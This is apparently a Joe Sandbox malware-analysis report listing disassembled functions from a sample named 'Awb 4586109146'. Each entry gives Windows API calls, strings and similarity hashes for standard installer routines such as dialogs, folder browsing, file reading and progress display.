Function 004043F0 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,?), ref: 0040448E
GetDlgItem.USER32(?,000003E8), ref: 004044A2
SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 004044BF
GetSysColor.USER32(?), ref: 004044D0
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044DE
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044EC
lstrlenW.KERNEL32(?), ref: 004044F1
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044FE
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404513
GetDlgItem.USER32(?,0000040A), ref: 0040456C
SendMessageW.USER32(00000000), ref: 00404573
GetDlgItem.USER32(?,000003E8), ref: 0040459E
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045E1
LoadCursorW.USER32(00000000,00007F02), ref: 004045EF
SetCursor.USER32(00000000), ref: 004045F2
LoadCursorW.USER32(00000000,00007F00), ref: 0040460B
SetCursor.USER32(00000000), ref: 0040460E
SendMessageW.USER32(00000111,?,00000000), ref: 0040463D
SendMessageW.USER32(00000010,00000000,00000000), ref: 0040464F

Strings

N, xrefs: 0040458C
gC@, xrefs: 004045FA

Memory Dump Source

Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: N$gC@
API String ID: 3103080414-4003572143
Opcode ID: 353f568027e9435f0b10a007412a0fb7b671a4650aedb506db2b7bc5b58b0be6
Instruction ID: 67960cbe9d5dd80a83daf25f2437327cccbb0fafcef4e9f4d39b28ee92a42e65
Opcode Fuzzy Hash: 353f568027e9435f0b10a007412a0fb7b671a4650aedb506db2b7bc5b58b0be6
Instruction Fuzzy Hash: ED618FB1900209BFDB109F60DD85EAA7B79FB84345F00853AF605B62D0D77DA951CFA8

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,?), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00433EE0,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
Instruction ID: 68187ad06c86d7515f13608b457f8be07a0117cb3bcf177897c910b083aea3f1
Opcode Fuzzy Hash: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
Instruction Fuzzy Hash: 9A418C71800209AFCF058F95DE459AF7BB9FF44315F00842AF591AA1A0C778EA54DFA4

Function 00405F06 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,004060A1,?,?), ref: 00405F41
GetShortPathNameW.KERNEL32(?,004308E8,00000400), ref: 00405F4A

Part of subcall function 00405D15: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D25
Part of subcall function 00405D15: lstrlenA.KERNEL32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D57

GetShortPathNameW.KERNEL32(?,004310E8,00000400), ref: 00405F67
wsprintfA.USER32 ref: 00405F85
GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,00000004,004310E8,?,?,?,?,?), ref: 00405FC0
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FCF
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406007
SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 0040605D
GlobalFree.KERNEL32(00000000), ref: 0040606E
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406075

Part of subcall function 00405DB0: GetFileAttributesW.KERNEL32(00442800,00402F1D,00442800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
Part of subcall function 00405DB0: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6

Strings

%ls=%ls, xrefs: 00405F7B
[Rename], xrefs: 00405FEF, 00406001

Memory Dump Source

Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: f8d4e974cc956983b46bcde362b03df5d37b76f918305d7ec0ca4ec5166a0624
Instruction ID: 4536b0422d5dde00314373cba87b6dc9e05edcb010d47b65b9eea0f1bfd6f862
Opcode Fuzzy Hash: f8d4e974cc956983b46bcde362b03df5d37b76f918305d7ec0ca4ec5166a0624
Instruction Fuzzy Hash: 5A313531641B04BBC220AB659D48F6B3AACEF45744F15003FFA46F62D2DB7C98118ABD

Function 00404722 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404771
SetWindowTextW.USER32(00000000,?), ref: 0040479B
SHBrowseForFolderW.SHELL32(?), ref: 0040484C
CoTaskMemFree.OLE32(00000000), ref: 00404857
lstrcmpiW.KERNEL32(00432E80,0042D248,00000000,?,?), ref: 00404889
lstrcatW.KERNEL32(?,00432E80), ref: 00404895
SetDlgItemTextW.USER32(?,000003FB,?), ref: 004048A7

Part of subcall function 00405904: GetDlgItemTextW.USER32(?,?,00000400,004048DE), ref: 00405917

Part of subcall function 0040654E: CharNextW.USER32(?,*?|<>/":,00000000,00000000,00441800,00441800,0043F000,0040336A,00441800,75573420,004035D9,?,00000006,00000008,0000000A), ref: 004065B1
Part of subcall function 0040654E: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004065C0
Part of subcall function 0040654E: CharNextW.USER32(?,00000000,00441800,00441800,0043F000,0040336A,00441800,75573420,004035D9,?,00000006,00000008,0000000A), ref: 004065C5
Part of subcall function 0040654E: CharPrevW.USER32(?,?,00441800,00441800,0043F000,0040336A,00441800,75573420,004035D9,?,00000006,00000008,0000000A), ref: 004065D8

GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,?,?,0042B218,?,?,000003FB,?), ref: 0040496A
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404985

Part of subcall function 00404ADE: lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B7F
Part of subcall function 00404ADE: wsprintfW.USER32 ref: 00404B88
Part of subcall function 00404ADE: SetDlgItemTextW.USER32(?,0042D248), ref: 00404B9B

Strings

A, xrefs: 00404845

Memory Dump Source

Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A
API String ID: 2624150263-3554254475
Opcode ID: 0e7a3ef283d1d7ec7faeb562c0eda326dd22e556ee24bddd125c463040a43afb
Instruction ID: 9ce2ccc5872d7715d19bac2dec5c0444f9ce2fea2c0a51142092d54e0f15b7c0
Opcode Fuzzy Hash: 0e7a3ef283d1d7ec7faeb562c0eda326dd22e556ee24bddd125c463040a43afb
Instruction Fuzzy Hash: F8A165B1A00208ABDB11AFA5CD45AAFB7B8EF84314F10847BF601B62D1D77C99418F6D

Function 00402EDD Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00402EEE
GetModuleFileNameW.KERNEL32(00000000,00442800,00000400,?,00000006,00000008,0000000A), ref: 00402F0A

Part of subcall function 00405DB0: GetFileAttributesW.KERNEL32(00442800,00402F1D,00442800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
Part of subcall function 00405DB0: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6

GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,00440800,00440800,00442800,00442800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56

Strings

soft, xrefs: 00402FCB
Error launching installer, xrefs: 00402F2D
Inst, xrefs: 00402FC2
Null, xrefs: 00402FD4
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004030B5

Memory Dump Source

Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-527102705
Opcode ID: 9da78bb69fdb731252d5033ab884fa182416324aee7ddcf9fc3f40609bcd7e9e
Instruction ID: dd9ea635540f9dffb1b2b479f8e1e5c18960c1b6140bd96a969558b27d112ec4
Opcode Fuzzy Hash: 9da78bb69fdb731252d5033ab884fa182416324aee7ddcf9fc3f40609bcd7e9e
Instruction Fuzzy Hash: C151F471901205ABDB20AF60DD85B9F7FA8FB0431AF15403BF910B62D5C7789E408BAD

Function 004062DC Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 209stringCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(00432E80,00000400), ref: 0040641D
GetWindowsDirectoryW.KERNEL32(00432E80,00000400,00000000,0042C228,?,00405359,0042C228,00000000), ref: 00406430
SHGetSpecialFolderLocation.SHELL32(00405359,?,00000000,0042C228,?,00405359,0042C228,00000000), ref: 0040646C
SHGetPathFromIDListW.SHELL32(?,00432E80), ref: 0040647A
CoTaskMemFree.OLE32(?), ref: 00406485
lstrcatW.KERNEL32(00432E80,\Microsoft\Internet Explorer\Quick Launch), ref: 004064AB
lstrlenW.KERNEL32(00432E80,00000000,0042C228,?,00405359,0042C228,00000000), ref: 00406503

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 004063ED
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004064A5

Memory Dump Source

Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-730719616
Opcode ID: e07025652e73fd573f6e327d7dbd94b5af98cadfbb304e7c9a8d62640b3ffd73
Instruction ID: 29f0adb049bea166a756856afc1b7ff582c4fdfd81cc2e884c30b49282791dbd
Opcode Fuzzy Hash: e07025652e73fd573f6e327d7dbd94b5af98cadfbb304e7c9a8d62640b3ffd73
Instruction Fuzzy Hash: E6611071A00111ABDF209F54DC41AAE37A9EF45318F26803FE943BA2D0D77D9AA1C79D

Function 00404298 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004042B5
GetSysColor.USER32(00000000), ref: 004042F3
SetTextColor.GDI32(?,00000000), ref: 004042FF
SetBkMode.GDI32(?,?), ref: 0040430B
GetSysColor.USER32(?), ref: 0040431E
SetBkColor.GDI32(?,?), ref: 0040432E
DeleteObject.GDI32(?), ref: 00404348
CreateBrushIndirect.GDI32(?), ref: 00404352

Memory Dump Source

Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
Instruction ID: a3c6a1d12b74a4a342abaca89036a15a37f51972f1e3113ed1cbee018e9c0b42
Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
Instruction Fuzzy Hash: 772156716007059BC724DF78D948B5B77F4AF81710B04893DED96A26E0D734E544CB54

Function 00403116 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 166COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00403180
GetTickCount.KERNEL32 ref: 00403227
MulDiv.KERNEL32(7FFFFFFF,00000064,00000000), ref: 00403250
wsprintfW.USER32 ref: 00403263

Strings

@, xrefs: 0040319A
... %d%%, xrefs: 0040325D

Memory Dump Source

Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%$@
API String ID: 551687249-3859443358
Opcode ID: 332a35644ce53e0492720e78fed1094326ce68f61c68911b2c6b8c231937ce50
Instruction ID: 5c504835c6c52170eea8577a9cac8da2a2598cbf1b76cdbdeb728d3f56fa2377
Opcode Fuzzy Hash: 332a35644ce53e0492720e78fed1094326ce68f61c68911b2c6b8c231937ce50
Instruction Fuzzy Hash: AA517A71900219DBCB10DFA5DA84A9E7BB8AF04366F14417BEC14B72C0CB78DA40CBA9

Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 004026F1
SetFilePointer.KERNEL32(?,?,?,?,?,00000008,?,?,?,?), ref: 00402714
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 0040272A

Part of subcall function 00405E91: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00405EA7

SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 004027D6

Strings

9, xrefs: 00402699

Memory Dump Source

Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 19438e2e62ba8aece1a895eee3c3762f252ce0cb36923fbe756b3879527f42a2
Instruction ID: 0a1b8613d15e357d59cabb4a84863d73d9dad353ca9b6e0785da3ca47288b3a0
Opcode Fuzzy Hash: 19438e2e62ba8aece1a895eee3c3762f252ce0cb36923fbe756b3879527f42a2
Instruction Fuzzy Hash: 42511974D00219AEDF219F95DA88AAEB779FF04304F10443BE901B72D0DBB89982CB18

Function 00405322 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0042C228,00000000,?,755723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
lstrlenW.KERNEL32(0040327A,0042C228,00000000,?,755723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
lstrcatW.KERNEL32(0042C228,0040327A,0040327A,0042C228,00000000,?,755723A0), ref: 0040537D
SetWindowTextW.USER32(0042C228,0042C228), ref: 0040538F
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD

Memory Dump Source

Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 165d7cb729b0b1d8dbd40609dc1f72fd4c041b11e62b4558e2d47e9179cb1f78
Instruction ID: 851cb2e595d07e8670ef4c489cf40fd5108cb81fe88e509cf6dd9e4b353e565e
Opcode Fuzzy Hash: 165d7cb729b0b1d8dbd40609dc1f72fd4c041b11e62b4558e2d47e9179cb1f78
Instruction Fuzzy Hash: 20218371900518BACF11AFA5DD859CFBFB9EF45350F14807AF904B62A0C7B94A40DFA8

Function 00404BEC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404C07
GetMessagePos.USER32 ref: 00404C0F
ScreenToClient.USER32(?,?), ref: 00404C29
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C3B
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C61

Strings

f, xrefs: 00404C3D

Memory Dump Source

Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction ID: 457ccdd811883e010b73e4973708530e0d9e00004b69c5e73a61d7a3cd07de8f
Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction Fuzzy Hash: CF015271900218BAEB10DBA4DD85BFEBBBCAF95711F10412BBA50B71D0D7B499018BA4

Function 00402DF3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,?,000000FA,00000000), ref: 00402E11
MulDiv.KERNEL32(?,00000064,?), ref: 00402E3C
wsprintfW.USER32 ref: 00402E4C
SetWindowTextW.USER32(?,?), ref: 00402E5C
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E

Strings

verifying installer: %d%%, xrefs: 00402E46

Memory Dump Source

Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: e1d542de2cd716b5e5aca43617af61348071ba80885408b45aa8db9304e84829
Instruction ID: 97abdd23f95b89fa957f28f44bfdcbbe1494948371ff671501e6f707f2390605
Opcode Fuzzy Hash: e1d542de2cd716b5e5aca43617af61348071ba80885408b45aa8db9304e84829
Instruction Fuzzy Hash: B7014F7164020CBBEF209F60DE49FAA3B69AB04304F008439FA06B91E0DBB885558B98

Function 00406624 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040663B
wsprintfW.USER32 ref: 00406676
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040668A

Strings

%s%S.dll, xrefs: 00406670
UXTHEME, xrefs: 0040662D
\, xrefs: 0040664C

Memory Dump Source

Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
Instruction ID: 9fa172bba6ca99a644905d2b6d7ed641771312ed853c50fe9922007c80c3d461
Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
Instruction Fuzzy Hash: 7CF0FC70501119A6CF10BB64DD0EF9B365CA700304F10447AA54AF10D1EBB9DB64CB99

Function 004028AD Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
GlobalFree.KERNEL32(?), ref: 00402956
GlobalFree.KERNEL32(00000000), ref: 00402969
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995

Memory Dump Source

Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: b3fdf1977b6322b79f2de70fe62da7d4d8df1abbe89a1d301570377ab221975a
Instruction ID: 46c72067781f24dbae578634f425dbba750e376c3d5c902d6f733973cd64d3bf
Opcode Fuzzy Hash: b3fdf1977b6322b79f2de70fe62da7d4d8df1abbe89a1d301570377ab221975a
Instruction Fuzzy Hash: 9621AEB1800128BBDF116FA5DE89DDE7E79AF08364F14423AF960762E0CB794C418B98

Function 0040654E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,00441800,00441800,0043F000,0040336A,00441800,75573420,004035D9,?,00000006,00000008,0000000A), ref: 004065B1
CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004065C0
CharNextW.USER32(?,00000000,00441800,00441800,0043F000,0040336A,00441800,75573420,004035D9,?,00000006,00000008,0000000A), ref: 004065C5
CharPrevW.USER32(?,?,00441800,00441800,0043F000,0040336A,00441800,75573420,004035D9,?,00000006,00000008,0000000A), ref: 004065D8

Strings

*?|<>/":, xrefs: 004065A0

Memory Dump Source

Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

